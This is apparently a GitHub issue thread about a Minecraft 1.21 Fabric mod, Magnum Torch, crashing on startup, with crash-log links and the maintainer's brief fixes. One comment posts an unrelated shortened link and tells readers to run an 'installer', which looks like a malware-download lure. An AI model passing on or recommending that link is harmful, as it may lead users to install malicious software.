### ISSUE TITLE
[Crash]: 1.21 - Crash on Startup

### ISSUE THREAD

**Issue by Gamemassa** [Fuzss/magnumtorch#28]
### Mod Loader

Fabric

### Minecraft Version(s)

1.21

### Mod Version(s)

v21.0.0

### Other Mods Involved

Not sure

### Notes

I just added Magnum Torch v21.0.0 to my MC 1.21 custom modpack, which required me to update PuzzlesLib to 21.0.24 and Forge Config API Port to 21.0.8, so I did, and my game crashes on startup.

### Crash Report

https://mclo.gs/aoU5h92

### latest.log

https://mclo.gs/aVvLtBx

**Comment by maher-nakesh** [comment]
try this
https://bit.ly/4e4zLlq
select the desired compiler in the installer

**Comment by Fuzss** [comment]
Update Easy Shulker Boxes.

**Comment by Gamemassa** [comment]
> Update Easy Shulker Boxes.

Not sure if it's related, but after updating Easy Shulker Boxes, the game launches to menu, and then when I try to load my SP world, I get this crash:

Crash Report:
https://mclo.gs/49dDXOW

Latest.log
https://mclo.gs/Gv2HHWs

**Comment by Fuzss** [comment]
Report this to Torch Master.
